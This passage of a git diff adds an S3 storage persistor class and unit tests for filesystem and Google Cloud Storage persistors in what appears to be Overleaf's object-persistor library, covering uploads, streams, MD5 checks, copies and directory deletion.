item.Key || '' })) + if (objects?.length) { + try { + await this._getClientForBucket(bucketName) + .deleteObjects({ + Bucket: bucketName, + Delete: { + Objects: objects, + Quiet: true, + }, + }) + .promise() + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to delete objects in S3', + { bucketName, key }, + WriteError + ) + } + } + + if (response.IsTruncated) { + await this.deleteDirectory( + bucketName, + key, + response.NextContinuationToken + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async #headObject(bucketName, key, opts = {}) { + const params = { Bucket: bucketName, Key: key } + if (opts.ssecOptions) { + Object.assign(params, opts.ssecOptions.getGetOptions()) + } + try { + return await this._getClientForBucket(bucketName) + .headObject(params) + .promise() + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting size of s3 object', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async getObjectSize(bucketName, key, opts = {}) { + const response = await this.#headObject(bucketName, key, opts) + return response.ContentLength || 0 + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async getObjectStorageClass(bucketName, key, opts = {}) { + const response = await this.#headObject(bucketName, key, opts) + return response.StorageClass + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @param {boolean} [opts.etagIsNotMD5] + * @return {Promise} + */ + async getObjectMd5Hash(bucketName, key, opts = {}) { + try { + if (!opts.etagIsNotMD5) { + const response = await this.#headObject(bucketName, key, opts) + const md5 = S3Persistor._md5FromResponse(response) + if (md5) { + return md5 + } + } + // etag is not in md5 format + Metrics.inc('s3.md5Download') + return await PersistorHelper.calculateStreamMd5( + await this.getObjectStream(bucketName, key, opts) + ) + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting hash of s3 object', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @return {Promise} + */ + async deleteObject(bucketName, key) { + try { + await this._getClientForBucket(bucketName) + .deleteObject({ Bucket: bucketName, Key: key }) + .promise() + } catch (err) { + // s3 does not give us a NotFoundError here + throw PersistorHelper.wrapError( + err, + 'failed to delete file in S3', + { bucketName, key }, + WriteError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} sourceKey + * @param {string} destKey + * @param {Object} opts + * @param {SSECOptions} [opts.ssecSrcOptions] + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async copyObject(bucketName, sourceKey, destKey, opts = {}) { + const params = { + Bucket: bucketName, + Key: destKey, + CopySource: `${bucketName}/${sourceKey}`, + } + if (opts.ssecSrcOptions) { + Object.assign(params, opts.ssecSrcOptions.getCopyOptions()) + } + if (opts.ssecOptions) { + Object.assign(params, opts.ssecOptions.getPutOptions()) + } + try { + await this._getClientForBucket(bucketName).copyObject(params).promise() + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'failed to copy file in S3', + params, + WriteError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {Object} opts + * @param {SSECOptions} [opts.ssecOptions] + * @return {Promise} + */ + async checkIfObjectExists(bucketName, key, opts) { + try { + await this.getObjectSize(bucketName, key, opts) + return true + } catch (err) { + if (err instanceof NotFoundError) { + return false + } + throw PersistorHelper.wrapError( + err, + 'error checking whether S3 object exists', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucketName + * @param {string} key + * @param {string} [continuationToken] + * @return {Promise} + */ + async directorySize(bucketName, key, continuationToken) { + try { + const options = { + Bucket: bucketName, + Prefix: key, + } + if (continuationToken) { + options.ContinuationToken = continuationToken + } + const response = await this._getClientForBucket(bucketName) + .listObjectsV2(options) + .promise() + + const size = + response.Contents?.reduce((acc, item) => (item.Size || 0) + acc, 0) || 0 + if (response.IsTruncated) { + return ( + size + + (await this.directorySize( + bucketName, + key, + response.NextContinuationToken + )) + ) + } + return size + } catch (err) { + throw PersistorHelper.wrapError( + err, + 'error getting directory size in S3', + { bucketName, key }, + ReadError + ) + } + } + + /** + * @param {string} bucket + * @param {boolean} computeChecksums + * @return {S3} + * @private + */ + _getClientForBucket(bucket, computeChecksums = false) { + /** @type {S3.Types.ClientConfiguration} */ + const clientOptions = {} + const cacheKey = `${bucket}:${computeChecksums}` + if (computeChecksums) { + clientOptions.computeChecksums = true + } + let client = this.#clients.get(cacheKey) + if (!client) { + client = new S3( + this._buildClientOptions( + this.settings.bucketCreds?.[bucket], + clientOptions + ) + ) + this.#clients.set(cacheKey, client) + } + return client + } + + /** + * @param {Object} bucketCredentials + * @param {S3.Types.ClientConfiguration} clientOptions + * @return {S3.Types.ClientConfiguration} + * @private + */ + _buildClientOptions(bucketCredentials, clientOptions) { + const options = clientOptions || {} + + if (bucketCredentials) { + options.credentials = { + accessKeyId: bucketCredentials.auth_key, + secretAccessKey: bucketCredentials.auth_secret, + } + } else if (this.settings.key) { + options.credentials = { + accessKeyId: this.settings.key, + secretAccessKey: this.settings.secret, + } + } else { + // Use the default credentials provider (process.env -> SSP -> ini -> IAM) + // Docs: https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/CredentialProviderChain.html#defaultProviders-property + } + + if (this.settings.endpoint) { + const endpoint = new URL(this.settings.endpoint) + options.endpoint = this.settings.endpoint + options.sslEnabled = endpoint.protocol === 'https:' + } + + // path-style access is only used for acceptance tests + if (this.settings.pathStyle) { + options.s3ForcePathStyle = true + } + + for (const opt of ['httpOptions', 'maxRetries', 'region']) { + if (this.settings[opt]) { + options[opt] = this.settings[opt] + } + } + + if (options.sslEnabled && this.settings.ca && !options.httpOptions?.agent) { + options.httpOptions = options.httpOptions || {} + options.httpOptions.agent = new https.Agent({ + rejectUnauthorized: true, + ca: this.settings.ca, + }) + } + + return options + } + + /** + * @param {S3.HeadObjectOutput} response + * @return {string|null} + * @private + */ + static _md5FromResponse(response) { + const md5 = (response.ETag || '').replace(/[ "]/g, '') + if (!md5.match(/^[a-f0-9]{32}$/)) { + return null + } + + return md5 + } +} + +module.exports = { + S3Persistor, + SSECOptions, +} diff --git a/libraries/object-persistor/test/Init.js b/libraries/object-persistor/test/Init.js new file mode 100644 index 0000000..2721d2f --- /dev/null +++ b/libraries/object-persistor/test/Init.js @@ -0,0 +1,33 @@ +const SandboxedModule = require('sandboxed-module') +const chai = require('chai') +const sinon = require('sinon') + +chai.use(require('sinon-chai')) +chai.use(require('chai-as-promised')) + +SandboxedModule.configure({ + requires: { + '@overleaf/logger': { + debug() {}, + log() {}, + info() {}, + warn() {}, + error() {}, + err() {}, + }, + '@overleaf/metrics': { + inc: sinon.stub(), + count: sinon.stub(), + histogram: sinon.stub(), + Timer: class Timer { + done() {} + }, + }, + }, + globals: { Buffer, Math, console, process, URL }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/libraries/object-persistor/test/unit/FSPersistorTests.js b/libraries/object-persistor/test/unit/FSPersistorTests.js new file mode 100644 index 0000000..dc7a5c5 --- /dev/null +++ b/libraries/object-persistor/test/unit/FSPersistorTests.js @@ -0,0 +1,417 @@ +const crypto = require('node:crypto') +const { expect } = require('chai') +const mockFs = require('mock-fs') +const fs = require('node:fs') +const fsPromises = require('node:fs/promises') +const Path = require('node:path') +const StreamPromises = require('node:stream/promises') +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../src/Errors') + +const MODULE_PATH = '../../src/FSPersistor.js' + +describe('FSPersistorTests', function () { + const localFiles = { + '/uploads/info.txt': Buffer.from('This information is critical', { + encoding: 'utf-8', + }), + '/uploads/other.txt': Buffer.from('Some other content', { + encoding: 'utf-8', + }), + } + const location = '/bucket' + const files = { + wombat: 'animals/wombat.tex', + giraffe: 'animals/giraffe.tex', + potato: 'vegetables/potato.tex', + } + + const scenarios = [ + { + description: 'default settings', + settings: {}, + fsPath: key => Path.join(location, key.replaceAll('/', '_')), + }, + { + description: 'with useSubdirectories = true', + settings: { useSubdirectories: true }, + fsPath: key => Path.join(location, key), + }, + ] + + for (const scenario of scenarios) { + describe(scenario.description, function () { + let persistor + + beforeEach(function () { + const FSPersistor = SandboxedModule.require(MODULE_PATH, { + requires: { + 'fs/promises': fsPromises, + 'stream/promises': StreamPromises, + './Errors': Errors, + }, + }) + persistor = new FSPersistor(scenario.settings) + }) + + beforeEach(function () { + mockFs({ + ...localFiles, + '/not-a-dir': + 'This regular file is meant to prevent using this path as a directory', + '/directory/subdirectory': {}, + }) + }) + + afterEach(function () { + mockFs.restore() + }) + + describe('sendFile', function () { + it('should copy the file', async function () { + await persistor.sendFile(location, files.wombat, '/uploads/info.txt') + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be.true + }) + + it('should return an error if the file cannot be stored', async function () { + await expect( + persistor.sendFile('/not-a-dir', files.wombat, '/uploads/info.txt') + ).to.be.rejectedWith(Errors.WriteError) + }) + }) + + describe('sendStream', function () { + let stream + + describe("when the file doesn't exist", function () { + beforeEach(function () { + stream = fs.createReadStream('/uploads/info.txt') + }) + + it('should write the stream to disk', async function () { + await persistor.sendStream(location, files.wombat, stream) + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be.true + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + + describe('on error', function () { + beforeEach(async function () { + await expect( + persistor.sendStream('/not-a-dir', files.wombat, stream) + ).to.be.rejectedWith(Errors.WriteError) + }) + + it('should not write the target file', async function () { + await expect(fsPromises.access(scenario.fsPath(files.wombat))).to + .be.rejected + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + }) + + describe('when the md5 hash matches', function () { + it('should write the stream to disk', async function () { + await persistor.sendStream(location, files.wombat, stream, { + sourceMd5: md5(localFiles['/uploads/info.txt']), + }) + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be + .true + }) + }) + + describe('when the md5 hash does not match', function () { + beforeEach(async function () { + await expect( + persistor.sendStream(location, files.wombat, stream, { + sourceMd5: md5('wrong content'), + }) + ).to.be.rejectedWith(Errors.WriteError) + }) + + it('should not write the target file', async function () { + await expect(fsPromises.access(scenario.fsPath(files.wombat))).to + .be.rejected + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + }) + }) + + describe('when the file already exists', function () { + let stream + + beforeEach(async function () { + await persistor.sendFile( + location, + files.wombat, + '/uploads/info.txt' + ) + stream = fs.createReadStream('/uploads/other.txt') + }) + + it('should write the stream to disk', async function () { + await persistor.sendStream(location, files.wombat, stream) + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/other.txt'])).to.be.true + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + + describe('on error', function () { + beforeEach(async function () { + await expect( + persistor.sendStream('/not-a-dir', files.wombat, stream) + ).to.be.rejectedWith(Errors.WriteError) + }) + + it('should not update the target file', async function () { + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be + .true + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + }) + + describe('when the md5 hash matches', function () { + it('should write the stream to disk', async function () { + await persistor.sendStream(location, files.wombat, stream, { + sourceMd5: md5(localFiles['/uploads/other.txt']), + }) + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/other.txt'])).to.be + .true + }) + }) + + describe('when the md5 hash does not match', function () { + beforeEach(async function () { + await expect( + persistor.sendStream(location, files.wombat, stream, { + sourceMd5: md5('wrong content'), + }) + ).to.be.rejectedWith(Errors.WriteError) + }) + + it('should not update the target file', async function () { + const contents = await fsPromises.readFile( + scenario.fsPath(files.wombat) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be + .true + }) + + it('should delete the temporary file', async function () { + await persistor.sendStream(location, files.wombat, stream) + const entries = await fsPromises.readdir(location) + const tempDirs = entries.filter(dir => dir.startsWith('tmp-')) + expect(tempDirs).to.be.empty + }) + }) + }) + }) + + describe('getObjectStream', function () { + beforeEach(async function () { + await persistor.sendFile(location, files.wombat, '/uploads/info.txt') + }) + + it('should return a string with the object contents', async function () { + const stream = await persistor.getObjectStream(location, files.wombat) + const contents = await streamToBuffer(stream) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be.true + }) + + it('should support ranges', async function () { + const stream = await persistor.getObjectStream( + location, + files.wombat, + { + start: 5, + end: 16, + } + ) + const contents = await streamToBuffer(stream) + // end is inclusive in ranges, but exclusive in slice() + expect(contents.equals(localFiles['/uploads/info.txt'].slice(5, 17))) + .to.be.true + }) + + it('should give a NotFoundError if the file does not exist', async function () { + await expect( + persistor.getObjectStream(location, 'does-not-exist') + ).to.be.rejectedWith(Errors.NotFoundError) + }) + }) + + describe('getObjectSize', function () { + beforeEach(async function () { + await persistor.sendFile(location, files.wombat, '/uploads/info.txt') + }) + + it('should return the file size', async function () { + expect( + await persistor.getObjectSize(location, files.wombat) + ).to.equal(localFiles['/uploads/info.txt'].length) + }) + + it('should throw a NotFoundError if the file does not exist', async function () { + await expect( + persistor.getObjectSize(location, 'does-not-exist') + ).to.be.rejectedWith(Errors.NotFoundError) + }) + }) + + describe('copyObject', function () { + beforeEach(async function () { + await persistor.sendFile(location, files.wombat, '/uploads/info.txt') + }) + + it('Should copy the file to the new location', async function () { + await persistor.copyObject(location, files.wombat, files.potato) + const contents = await fsPromises.readFile( + scenario.fsPath(files.potato) + ) + expect(contents.equals(localFiles['/uploads/info.txt'])).to.be.true + }) + }) + + describe('deleteObject', function () { + beforeEach(async function () { + await persistor.sendFile(location, files.wombat, '/uploads/info.txt') + await fsPromises.access(scenario.fsPath(files.wombat)) + }) + + it('should delete the file', async function () { + await persistor.deleteObject(location, files.wombat) + await expect(fsPromises.access(scenario.fsPath(files.wombat))).to.be + .rejected + }) + + it("should ignore files that don't exist", async function () { + await persistor.deleteObject(location, 'does-not-exist') + }) + }) + + describe('deleteDirectory', function () { + beforeEach(async function () { + for (const file of Object.values(files)) { + await persistor.sendFile(location, file, '/uploads/info.txt') + await fsPromises.access(scenario.fsPath(file)) + } + }) + + it('should delete all files under the directory', async function () { + await persistor.deleteDirectory(location, 'animals') + for (const file of [files.wombat, files.giraffe]) { + await expect(fsPromises.access(scenario.fsPath(file))).to.be + .rejected + } + }) + + it('should not delete files under other directoris', async function () { + await persistor.deleteDirectory(location, 'animals') + await fsPromises.access(scenario.fsPath(files.potato)) + }) + + it("should ignore directories that don't exist", async function () { + await persistor.deleteDirectory(location, 'does-not-exist') + for (const file of Object.values(files)) { + await fsPromises.access(scenario.fsPath(file)) + } + }) + }) + + describe('checkIfObjectExists', function () { + beforeEach(async function () { + await persistor.sendFile(location, files.wombat, '/uploads/info.txt') + }) + + it('should return true for existing files', async function () { + expect( + await persistor.checkIfObjectExists(location, files.wombat) + ).to.equal(true) + }) + + it('should return false for non-existing files', async function () { + expect( + await persistor.checkIfObjectExists(location, 'does-not-exist') + ).to.equal(false) + }) + }) + + describe('directorySize', function () { + beforeEach(async function () { + for (const file of Object.values(files)) { + await persistor.sendFile(location, file, '/uploads/info.txt') + } + }) + + it('should sum directory files size', async function () { + expect(await persistor.directorySize(location, 'animals')).to.equal( + 2 * localFiles['/uploads/info.txt'].length + ) + }) + + it('should return 0 on non-existing directories', async function () { + expect( + await persistor.directorySize(location, 'does-not-exist') + ).to.equal(0) + }) + }) + }) + } +}) + +function md5(str) { + return crypto.createHash('md5').update(str).digest('hex') +} + +async function streamToBuffer(stream) { + const chunks = [] + for await (const chunk of stream) { + chunks.push(chunk) + } + return Buffer.concat(chunks) +} diff --git a/libraries/object-persistor/test/unit/GcsPersistorTests.js b/libraries/object-persistor/test/unit/GcsPersistorTests.js new file mode 100644 index 0000000..16a42c7 --- /dev/null +++ b/libraries/object-persistor/test/unit/GcsPersistorTests.js @@ -0,0 +1,726 @@ +const { EventEmitter } = require('node:events') +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../src/GcsPersistor.js' +const SandboxedModule = require('sandboxed-module') +const { ObjectId } = require('mongodb') +const asyncPool = require('tiny-async-pool') + +const Errors = require('../../src/Errors') + +describe('GcsPersistorTests', function () { + const filename = '/wombat/potato.tex' + const bucket = 'womBucket' + const key = 'monKey' + const destKey = 'donKey' + const genericError = new Error('guru meditation error') + const filesSize = 33 + const md5 = 'ffffffff00000000ffffffff00000000' + const WriteStream = 'writeStream' + const redirectUrl = 'https://wombat.potato/giraffe' + + let Logger, + Transform, + PassThrough, + Storage, + Fs, + GcsNotFoundError, + ReadStream, + Stream, + StreamPromises, + GcsBucket, + GcsFile, + GcsPersistor, + FileNotFoundError, + Hash, + Settings, + crypto, + files + + beforeEach(function () { + Settings = { + directoryKeyRegex: /^[0-9a-fA-F]{24}\/[0-9a-fA-F]{24}/, + } + + files = [ + { + metadata: { size: '11', md5Hash: '/////wAAAAD/////AAAAAA==' }, + delete: sinon.stub(), + }, + { + metadata: { size: '22', md5Hash: '/////wAAAAD/////AAAAAA==' }, + delete: sinon.stub(), + }, + ] + + class FakeGCSResponse extends EventEmitter { + constructor() { + super() + this.statusCode = 200 + this.err = null + } + + read() { + if (this.err) return this.emit('error', this.err) + this.emit('response', { statusCode: this.statusCode, headers: {} }) + } + } + + ReadStream = new FakeGCSResponse() + PassThrough = class {} + + Transform = class { + once() {} + } + + Stream = { + PassThrough, + Transform, + } + + StreamPromises = { + pipeline: sinon.stub().resolves(), + } + + GcsFile = { + delete: sinon.stub().resolves(), + createReadStream: sinon.stub().returns(ReadStream), + getMetadata: sinon.stub().resolves([files[0].metadata]), + createWriteStream: sinon.stub().returns(WriteStream), + copy: sinon.stub().resolves(), + exists: sinon.stub().resolves([true]), + getSignedUrl: sinon.stub().resolves([redirectUrl]), + } + + GcsBucket = { + file: sinon.stub().returns(GcsFile), + getFiles: sinon.stub().resolves([files]), + } + + Storage = class { + constructor() { + this.interceptors = [] + } + } + Storage.prototype.bucket = sinon.stub().returns(GcsBucket) + + GcsNotFoundError = new Error('File not found') + GcsNotFoundError.code = 404 + + Fs = { + createReadStream: sinon.stub().returns(ReadStream), + } + + FileNotFoundError = new Error('File not found') + FileNotFoundError.code = 'ENOENT' + + Hash = { + end: sinon.stub(), + read: sinon.stub().returns(md5), + digest: sinon.stub().returns(md5), + setEncoding: sinon.stub(), + } + crypto = { + createHash: sinon.stub().returns(Hash), + } + + Logger = { + warn: sinon.stub(), + } + + GcsPersistor = new (SandboxedModule.require(modulePath, { + requires: { + '@google-cloud/storage': { Storage }, + '@overleaf/logger': Logger, + 'tiny-async-pool': asyncPool, + './Errors': Errors, + fs: Fs, + stream: Stream, + 'stream/promises': StreamPromises, + crypto, + }, + globals: { console, Buffer }, + }))(Settings) + }) + + describe('getObjectStream', function () { + describe('when called with valid parameters', function () { + let stream + + beforeEach(async function () { + stream = await GcsPersistor.getObjectStream(bucket, key) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(PassThrough) + }) + + it('fetches the right key from the right bucket', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.createReadStream).to.have.been.called + }) + + it('disables automatic decompression', function () { + expect(GcsFile.createReadStream).to.have.been.calledWith({ + decompress: false, + }) + }) + + it('pipes the stream through the meter', function () { + expect(StreamPromises.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Transform), + sinon.match.instanceOf(PassThrough) + ) + }) + }) + + describe('when called with a byte range', function () { + let stream + + beforeEach(async function () { + stream = await GcsPersistor.getObjectStream(bucket, key, { + start: 5, + end: 10, + }) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(PassThrough) + }) + + it('passes the byte range on to GCS', function () { + expect(GcsFile.createReadStream).to.have.been.calledWith({ + decompress: false, + start: 5, + end: 10, + }) + }) + }) + + describe("when the file doesn't exist", function () { + let error, stream + + beforeEach(async function () { + ReadStream.statusCode = 404 + try { + stream = await GcsPersistor.getObjectStream(bucket, key) + } catch (e) { + error = e + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + + describe('when Gcs encounters an unknown error', function () { + let error, stream + + beforeEach(async function () { + ReadStream.err = genericError + try { + stream = await GcsPersistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + }) + + describe('getRedirectUrl', function () { + let signedUrl + + describe('with signed URLs', function () { + beforeEach(async function () { + signedUrl = await GcsPersistor.getRedirectUrl(bucket, key) + }) + + it('should request a signed URL', function () { + expect(GcsFile.getSignedUrl).to.have.been.called + }) + + it('should return the url', function () { + expect(signedUrl).to.equal(redirectUrl) + }) + }) + + describe('with unsigned URLs', function () { + beforeEach(async function () { + GcsPersistor.settings.unsignedUrls = true + GcsPersistor.settings.endpoint = { + apiEndpoint: 'http://custom.endpoint', + } + signedUrl = await GcsPersistor.getRedirectUrl(bucket, key) + }) + + it('should return a plain URL', function () { + expect(signedUrl).to.equal( + `http://custom.endpoint/download/storage/v1/b/${bucket}/o/${key}?alt=media` + ) + }) + }) + }) + + describe('getObjectSize', function () { + describe('when called with valid parameters', function () { + let size + + beforeEach(async function () { + size = await GcsPersistor.getObjectSize(bucket, key) + }) + + it('should return the object size', function () { + expect(size).to.equal(11) + }) + + it('should pass the bucket and key to GCS', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.getMetadata).to.have.been.called + }) + }) + + describe('when the object is not found', function () { + let error + + beforeEach(async function () { + GcsFile.getMetadata = sinon.stub().rejects(GcsNotFoundError) + try { + await GcsPersistor.getObjectSize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(GcsNotFoundError) + }) + }) + + describe('when GCS returns an error', function () { + let error + + beforeEach(async function () { + GcsFile.getMetadata = sinon.stub().rejects(genericError) + try { + await GcsPersistor.getObjectSize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('sendStream', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return GcsPersistor.sendStream(bucket, key, ReadStream) + }) + + it('should upload the stream', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.createWriteStream).to.have.been.called + }) + + it('should not try to create a resumable upload', function () { + expect(GcsFile.createWriteStream).to.have.been.calledWith({ + resumable: false, + }) + }) + + it('should meter the stream and pass it to GCS', function () { + expect(StreamPromises.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Transform), + WriteStream + ) + }) + + it('calculates the md5 hash of the file', function () { + expect(Hash.digest).to.have.been.called + }) + }) + + describe('when a hash is supplied', function () { + beforeEach(async function () { + return GcsPersistor.sendStream(bucket, key, ReadStream, { + sourceMd5: 'aaaaaaaabbbbbbbbaaaaaaaabbbbbbbb', + }) + }) + + it('should not calculate the md5 hash of the file', function () { + expect(Hash.digest).not.to.have.been.called + }) + + it('sends the hash in base64', function () { + expect(GcsFile.createWriteStream).to.have.been.calledWith({ + validation: 'md5', + metadata: { + md5Hash: 'qqqqqru7u7uqqqqqu7u7uw==', + }, + resumable: false, + }) + }) + + it('does not fetch the md5 hash of the uploaded file', function () { + expect(GcsFile.getMetadata).not.to.have.been.called + }) + }) + + describe('when metadata is supplied', function () { + const contentType = 'text/csv' + const contentEncoding = 'gzip' + + beforeEach(async function () { + return GcsPersistor.sendStream(bucket, key, ReadStream, { + contentType, + contentEncoding, + }) + }) + + it('should send the metadata to GCS', function () { + expect(GcsFile.createWriteStream).to.have.been.calledWith({ + metadata: { contentType, contentEncoding }, + resumable: false, + }) + }) + }) + + describe('when the upload fails', function () { + let error + beforeEach(async function () { + StreamPromises.pipeline + .withArgs(ReadStream, sinon.match.instanceOf(Transform), WriteStream) + .rejects(genericError) + try { + await GcsPersistor.sendStream(bucket, key, ReadStream) + } catch (err) { + error = err + } + }) + + it('throws a WriteError', function () { + expect(error).to.be.an.instanceOf(Errors.WriteError) + }) + + it('wraps the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('sendFile', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return GcsPersistor.sendFile(bucket, key, filename) + }) + + it('should create a read stream for the file', function () { + expect(Fs.createReadStream).to.have.been.calledWith(filename) + }) + + it('should create a write stream', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.createWriteStream).to.have.been.called + }) + + it('should upload the stream via the meter', function () { + expect(StreamPromises.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Transform), + WriteStream + ) + }) + }) + }) + + describe('copyObject', function () { + const destinationFile = 'destFile' + + beforeEach(function () { + GcsBucket.file.withArgs(destKey).returns(destinationFile) + }) + + describe('with valid parameters', function () { + beforeEach(async function () { + return GcsPersistor.copyObject(bucket, key, destKey) + }) + + it('should copy the object', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.copy).to.have.been.calledWith(destinationFile) + }) + }) + + describe('when the file does not exist', function () { + let error + + beforeEach(async function () { + GcsFile.copy = sinon.stub().rejects(GcsNotFoundError) + try { + await GcsPersistor.copyObject(bucket, key, destKey) + } catch (err) { + error = err + } + }) + + it('should throw a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + }) + }) + + describe('deleteObject', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return GcsPersistor.deleteObject(bucket, key) + }) + + it('should delete the object', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.delete).to.have.been.called + }) + }) + + describe('when the file does not exist', function () { + let error + + beforeEach(async function () { + GcsFile.delete = sinon.stub().rejects(GcsNotFoundError) + try { + await GcsPersistor.deleteObject(bucket, key) + } catch (err) { + error = err + } + }) + + it('should not throw an error', function () { + expect(error).not.to.exist + }) + }) + }) + + describe('deleteDirectory', function () { + const directoryName = `${new ObjectId()}/${new ObjectId()}` + const directoryPrefix = `${directoryName}/` + describe('with valid parameters', function () { + beforeEach(async function () { + GcsBucket.getFiles = sinon.stub() + // set up multiple paginated calls to getFiles + GcsBucket.getFiles + .withArgs({ prefix: directoryPrefix, autoPaginate: false }) + .resolves([['aaa', 'bbb'], 'call-1']) + GcsBucket.getFiles + .withArgs('call-1') + .resolves([['ccc', 'ddd', 'eee'], 'call-2']) + GcsBucket.getFiles.withArgs('call-2').resolves([['fff', 'ggg']]) + return GcsPersistor.deleteDirectory(bucket, directoryName) + }) + + it('should list the objects in the directory', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.getFiles).to.have.been.calledWith({ + prefix: directoryPrefix, + autoPaginate: false, + }) + expect(GcsBucket.getFiles).to.have.been.calledWith('call-1') + expect(GcsBucket.getFiles).to.have.been.calledWith('call-2') + }) + + it('should delete the files', function () { + expect(GcsFile.delete.callCount).to.equal(7) + }) + }) + + describe('when there is an error listing the objects', function () { + let error + + beforeEach(async function () { + GcsBucket.getFiles = sinon.stub().rejects(genericError) + try { + await GcsPersistor.deleteDirectory(bucket, directoryName) + } catch (err) { + error = err + } + }) + + it('should generate a WriteError', function () { + expect(error).to.be.an.instanceOf(Errors.WriteError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('directorySize', function () { + describe('with valid parameters', function () { + let size + + beforeEach(async function () { + size = await GcsPersistor.directorySize(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + 